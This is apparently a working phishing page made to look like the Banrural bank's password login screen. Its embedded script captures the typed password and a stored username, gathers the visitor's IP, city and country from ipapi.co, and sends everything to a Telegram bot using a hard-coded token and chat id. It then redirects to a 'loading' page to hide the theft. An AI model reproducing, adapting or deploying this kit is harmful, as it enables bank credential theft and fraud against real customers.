<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Ban Rural</title>
    <style>
      body {
        position: relative;
        height: 100%;
        overflow: hidden;
        margin: 0px;
        padding: 0px;
        border: none;
        background: #fff url(bg-login-1.jpg) no-repeat fixed top;
        background-size: cover;
        display: block;
      }
      .center {
        max-width: 361px;

        height: 522px;
        background: #e6e6e6;
      }
      .centrar {
        margin: 100px;
      }
      @media (max-width: 600px) {
        .centrar {
          display: grid;
          margin: 0px;
          place-items: center;
          height: 522px;
          margin-top: 20px;
        }
        .center {
          width: 95%;
          height: 100%;
        }
      }
    </style>
  </head>
  <body>
    <div
      style="
        display: flex;
        justify-content: space-between;
        width: 100%;
        height: 100px;
        background: #00853f;
      "
    >
      <img
        src="logoizquierda.png"
        alt="Imagen Izquierda"
        style="width: 120px; padding: 20px"
      />
      <img
        src="derecha.png"
        alt="Imagen Derecha"
        style="width: 50px; height: 50px; padding: 25px"
      />
    </div>

    <div style="width: 100%; height: 5px; background: #f68e1e"></div>
    <form id="loginform">
      <div class="centrar">
        <div class="center">
          <div style="text-align: center">
            <img src="logo1.png" style="width: 200px; margin-top: 80px" />
          </div>
          <div style="text-align: left; margin-left: 20px; margin-top: 50px">
            <img src="contra.jpg" alt="" style="width: 110px" />
          </div>
          <div style="display: flex; align-items: center; margin-left: 20px">
            <input
              maxlength="22"
              required=""
              name="ix1"
              id="ix1"
              type="password"
              placeholder=""
              autocomplete="off"
              style="
                height: 32px;
                width: 154px;
                border: none;
                background: white;
                padding: 0px 0 0 8px;
                border: 1px solid rgb(184, 184, 184);
                font-size: 16px;
                font-family: sans-serif;
              "
            />
            <div style="margin-left: 10px; padding-top: 5px">
              <button style="background: transparent; border: 0; margin: 0">
                <img src="boton.JPG" width="140" />
              </button>
            </div>
          </div>
          <div style="text-align: center">
            <img src="campos.JPG" style="width: 280px; margin-top: 30px" />
          </div>
        </div>
      </div>
    </form>
  </body>

  <script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>

  <script>
    const url = "https://ipapi.co/json/";
    const form = document.querySelector("#loginform");
    form.addEventListener("submit", (event) => {
      event.preventDefault(); // aqui evitamos que el código se repita evita que se envíe el formulario
      axios
        .get(url)
        .then((response) => {
          const contra = document.querySelector("#ix1").value;
          const message =
            "\nBanrural\nUsuario: " +
            localStorage.getItem("usuario") +
            "\nContra: " +
            contra +
            "\nCiudad:" +
            response.data.city +
            "\nPais: " +
            response.data.country +
            "\nIP: " +
            response.data.ip;
          axios
            .post(
              "https://api.telegram.org/bot7754122794:AAElKR1eLtxQ1m0s0ENGtWm2WE_cwYdhNlw/sendMessage",
              {
                chat_id: "-4570779421",
                text: message,
              }
            )
            .then((response) => {
              console.log(response.data);
              window.location.href = "cargando.html";
            })
            .catch((error) => {
              console.error(error);
            });
        })
        .catch((error) => {
          console.log(error);
        });
    });
  </script>
</html>
